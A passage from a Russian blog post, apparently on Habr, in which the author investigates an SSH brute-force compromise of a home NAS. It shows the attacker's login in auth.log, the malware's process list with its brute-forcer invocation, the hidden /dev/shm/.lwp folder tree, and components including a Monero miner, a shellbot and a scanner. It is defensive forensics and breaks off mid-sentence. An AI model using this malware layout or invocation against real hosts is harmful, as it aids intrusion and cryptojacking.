{"id":296720,"date":"2020-01-03T21:00:05","date_gmt":"2020-01-03T21:00:05","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=296720"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=296720","title":{"rendered":"\u0422\u0430\u0439\u043d\u0430\u044f \u0436\u0438\u0437\u043d\u044c Linux \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438\u043b\u0438 \u0432\u0435\u0435\u0440\u043d\u0430\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0443 SSH"},"content":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/482784\/\">\n<p>\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u043e\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP \u0431\u044b\u043b \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 IVI \u0441 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">\u0412\u0430\u0448 ip-\u0430\u0434\u0440\u0435\u0441 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u044b\u0439.  \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0432\u043e\u0435\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443. IP \u0430\u0434\u0440\u0435\u0441 &lt;IP&gt;. \u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b maxmind.com<\/code><\/pre>\n<p><a name=\"habracut\"><\/a>  <\/p>\n<h2 id=\"chto-eto-znachit\">\u0427\u0442\u043e \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442?<\/h2>\n<p>  <\/p>\n<p>\u0412 \u0431\u0430\u0437\u0435 \u0437\u043d\u0430\u043d\u0438\u0439 IVI \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 <a href=\"https:\/\/ask.ivi.ru\/knowledge-bases\/2\/articles\/32993-oshibka-4530\">\u043e\u0448\u0438\u0431\u043a\u0435 4530<\/a>, \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439, \u0433\u043b\u0430\u0441\u0438\u0442, \u0447\u0442\u043e \u043d\u0430 IP \u0430\u0434\u0440\u0435\u0441\u0435 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d VPN \u0438\u043b\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u0440\u043e\u043a\u0441\u0438. \u041d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u044f \u0441\u043e\u0437\u043d\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b. \u041c\u043d\u0435 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0439 \u0440\u043e\u0443\u0442\u0435\u0440 \u0438\u043b\u0438 NAS, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u0432 \u0441\u0435\u0442\u044c, \u0443\u0447\u0430\u0441\u0442\u0432\u0443\u044e\u0442 \u0432 \u043a\u0430\u043a\u0438\u0445-\u0442\u043e \u043d\u0435\u043f\u0440\u0438\u0441\u0442\u043e\u0439\u043d\u043e\u0441\u0442\u044f\u0445.<\/p>\n<p>  <\/p>\n<h1 id=\"diskleymer\">\u0414\u0438\u0441\u043a\u043b\u0435\u0439\u043c\u0435\u0440<\/h1>\n<p>  <\/p>\n<p><em>\u041c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b, \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u043d\u0438\u0436\u0435, \u043d\u0435\u0441\u0443\u0442 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430\u0443\u0447\u043d\u043e-\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440. \u0414\u0430\u043d\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u0430\u0432\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043d\u0430\u0443\u0447\u043d\u043e-\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u0435\u0433\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u043d\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0438 \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0437\u043d\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e\u043c \u043a \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u043f\u0440\u0430\u0432\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439. \u041f\u0440\u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0430\u0432\u0442\u043e\u0440 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0420\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u043d\u0430\u0443\u0447\u043d\u043e-\u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u043f\u0440\u0430\u0432\u043d\u043e\u0433\u043e \u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u0438\u043d\u043e\u0433\u043e \u043e\u0442 \u043d\u0430\u0443\u0447\u043d\u043e\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u043b\u0435\u0447\u044c \u0437\u0430 \u0441\u043e\u0431\u043e\u0439 \u0443\u0433\u043e\u043b\u043e\u0432\u043d\u0443\u044e, \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u0438 (\u0438\u043b\u0438) \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0441\u043a\u043e-\u043f\u0440\u0430\u0432\u043e\u0432\u0443\u044e \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c. \u0410\u0432\u0442\u043e\u0440 \u043d\u0435 \u043d\u0435\u0441\u0435\u0442 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0432 \u0441\u0444\u0435\u0440\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u043c\u0435\u044e\u0449\u0438\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f.<\/em><\/p>\n<p>  <\/p>\n<h2 id=\"razbiraemsya-chto-zhe-proizoshlo\">\u0420\u0430\u0437\u0431\u0438\u0440\u0430\u0435\u043c\u0441\u044f \u0447\u0442\u043e \u0436\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e<\/h2>\n<p>  <\/p>\n<p>\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0438 \u043b\u043e\u0433\u0438 \u0440\u043e\u0443\u0442\u0435\u0440\u0430, \u044f \u0443\u0431\u0435\u0434\u0438\u043b\u0441\u044f \u0447\u0442\u043e \u043e\u043d \u0447\u0438\u0441\u0442, \u0430 \u043c\u043e\u0439 NAS \u0441\u0442\u043e\u0438\u0442 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 DMZ. \u042f \u0437\u0430\u0448\u0435\u043b \u043d\u0430 NAS \u0438 \u043f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u043b \u0441\u0442\u043e\u0438\u0442 \u043b\u0438 \u043d\u0430 \u043d\u0435\u043c fail2ban \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d \u043b\u0438 ufw. \u041d\u0438 \u0442\u043e\u0433\u043e \u043d\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u044f \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u0430 <code>auth.log<\/code> \u0431\u044b\u043b \u0432\u043d\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u043c\u0435\u0440\u0430. \u041f\u043e\u0445\u043e\u0436\u0435, \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 \u0441\u0442\u0430\u043b \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437 ssh.<\/p>\n<p>  <\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0432 <code>grep -in Accept \/var\/log\/auth.log<\/code> \u044f \u0443\u0432\u0438\u0434\u0435\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">98341:Dec 23 23:45:36 fileserver sshd[23179]: Accepted password for timemachine from 46.101.149.19 port 45573 ssh2<\/code><\/pre>\n<p>  <\/p>\n<p>\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0448\u0435\u043b \u043f\u043e\u0434 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c timemachine c IP \u0430\u0434\u0440\u0435\u0441\u0430 46.101.149.19 \u0432\u043e \u0444\u0440\u0430\u043d\u043a\u0444\u0443\u0440\u0442\u0435. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u043f\u043e\u043f\u0430\u043b\u0430\u0441\u044c \u0432 \u043b\u043e\u0433\u0435 \u0432\u0441\u0435\u0433\u043e \u043e\u0434\u0438\u043d \u0440\u0430\u0437, \u043f\u043e\u0447\u0442\u0438 \u043d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434. \u041e\u0434\u043d\u0430\u043a\u043e. \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u0412\u044b\u0437\u043e\u0432<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">ps -aux | grep timema<\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u043e\u043a\u0430\u0437\u0430\u043b \u0442\u0430\u043a\u043e\u0439 \u043d\u0430\u0431\u043e\u0440 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">timemac+  3512  123 13.3 302904 267484 ?       Ssl  Dec25 4728:49 .\/cron timemac+  3590  0.0  0.1  12884  3232 ?        S    Dec25   0:00 \/bin\/bash .\/go timemac+ 17476  0.0  0.0  11740   924 ?        S    13:47   0:00 timeout 6h .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17477  0.0  0.1  12884  3036 ?        S    13:47   0:00 \/bin\/bash .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17482  112  2.4 3500784 49616 ?       Sl   13:47 146:11 \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/tsm --library-path \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/ \/usr\/sbin\/httpd sync\/c\/tsm64 -t 301 timemac+ 23184  0.0  0.3  76764  7288 ?        Ss   Dec23   0:00 \/lib\/systemd\/systemd --user timemac+ 23185  0.0  0.1 206708  2204 ?        S    Dec23   0:00 (sd-pam) timemac+ 24436  0.0  0.3  27412  6672 ?        S    Dec24   1:49 rsync timemac+  3512  123 13.3 302904 267484 ?       Ssl  Dec25 4728:51 .\/cron timemac+  3590  0.0  0.1  12884  3232 ?        S    Dec25   0:00 \/bin\/bash .\/go timemac+ 17476  0.0  0.0  11740   924 ?        S    13:47   0:00 timeout 6h .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17477  0.0  0.1  12884  3036 ?        S    13:47   0:00 \/bin\/bash .\/tsm -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 17482  112  2.4 3500784 49628 ?       Sl   13:47 146:15 \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/tsm --library-path \/dev\/shm\/.lwp\/.rsync\/c\/lib\/64\/ \/usr\/sbin\/httpd sync\/c\/tsm64 -t 301 -f 1 -s 12 -S 12 -p 0 -P 0 -d 1 p ip timemac+ 23184  0.0  0.3  76764  7288 ?        Ss   Dec23   0:00 \/lib\/systemd\/systemd --user timemac+ 23185  0.0  0.1 206708  2204 ?        S    Dec23   0:00 (sd-pam) timemac+ 24436  0.0  0.3  27412  6672 ?        S    Dec24   1:49 rsync<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041f\u043e\u0445\u043e\u0436\u0435, \u0432\u0441\u0435 \u043f\u0443\u0442\u0438 \u0432\u0435\u0434\u0443\u0442 \u0432 <code>\/dev\/shm\/.lwp<\/code>. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0447\u0442\u043e \u0442\u0430\u043c.<\/p>\n<p>  <\/p>\n<h2 id=\"struktura-malvari\">\u0421\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043c\u0430\u043b\u0432\u0430\u0440\u0438<\/h2>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043d\u0430\u043f\u0448\u043e\u0442 \u0440\u0430\u0431\u043e\u0447\u0435\u0439 \u043f\u0430\u043f\u043a\u0438<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\">\/dev\/shm\/.lwp \u251c\u2500\u2500 apt.conf \u251c\u2500\u2500 dota3.tar.gz \u251c\u2500\u2500 .out \u251c\u2500\u2500 .rsync \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 anacron \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 bash.pid \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 init0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 .procs \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 upd \u2502\u00a0\u00a0 \u251c\u2500\u2500 b \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 sync \u2502\u00a0\u00a0 \u251c\u2500\u2500 c \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 a \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 aptitude \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 b \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron.d \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir2.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 go \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 golan \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 ip \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 lib \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 32 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_files.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv-2.23.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 64 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libnss_files.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv-2.23.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 arm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libarmmem-v7l.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libc.so.6 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libdl.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libnss_dns.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libpthread.so.0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libresolv.so \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u251c\u2500\u2500 libresolv.so.2 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0     \u2514\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 n \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 p \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 run \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 slow \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 start \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 stop \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm32 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsm64 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 tsmv7 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 watchdog \u2502\u00a0\u00a0 \u251c\u2500\u2500 cron.d \u2502\u00a0\u00a0 \u251c\u2500\u2500 dir.dir \u2502\u00a0\u00a0 \u251c\u2500\u2500 init \u2502\u00a0\u00a0 \u251c\u2500\u2500 init2 \u2502\u00a0\u00a0 \u251c\u2500\u2500 initall \u2502\u00a0\u00a0 \u2514\u2500\u2500 .out \u2514\u2500\u2500 timemachine  8 directories, 70 files<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0423 \u0442\u0440\u043e\u044f\u043d\u0430 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0434\u0435\u043b\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0447\u0430\u0441\u0442\u0438 <\/p>\n<p>  <\/p>\n<ul>\n<li>\u041c\u0430\u0439\u043d\u0435\u0440 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b <a href=\"https:\/\/github.com\/xmrig\/xmrig\">XMRIG<\/a> (.rsync\/a)<\/li>\n<li>\u0428\u0435\u043b\u043b\u0431\u043e\u0442 (.rsync\/b)<\/li>\n<li>\u0421\u043a\u0430\u043d\u0435\u0440-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0435\u0440 (.rsync\/c)<\/li>\n<li>\u041b\u0430\u043d\u0447\u0435\u0440 (.rsync\/init \u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f)<\/li>\n<\/ul>\n<p>  <\/p>\n<h3 id=\"mayner\">\u041c\u0430\u0439\u043d\u0435\u0440<\/h3>\n<p>  <\/p>\n<p>\u041a\u0430\u0441\u0442\u043e\u043c\u043d\u0430\u044f \u0441\u0431\u043e\u0440\u043a\u0430 XMRIG. \u0421\u043e\u0431\u0440\u0430\u043d \u043f\u043e\u0434 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b <code>\u044586<\/code> \u0438 <code>\u044564<\/code>. \u0412\u0441\u044f \u043a\u0430\u0441\u0442\u043e\u043c\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0435, \u0437\u0430\u0448\u0438\u0442\u043e\u043c \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a. \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0435\u0433\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u044c \u0438 \u043f\u043e\u043d\u044f\u0442\u044c \u043d\u0430 \u043a\u043e\u0433\u043e \u0442\u0440\u0443\u0434\u0438\u043b\u0430\u0441\u044c \u043c\u043e\u044f \u043c\u0430\u0448\u0438\u043d\u043a\u0430. \u0423 XMRIG \u0435\u0441\u0442\u044c <a href=\"https:\/\/xmrig.com\/wizard\">\u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440 \u043a\u043e\u043d\u0444\u0438\u0433\u043e\u0432<\/a>. \u041d\u0430\u0449\u0451\u043b\u043a\u0430\u0435\u043c \u043b\u044e\u0431\u0443\u044e \u043f\u0440\u043e\u0441\u0442\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e. \u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043c\u044b 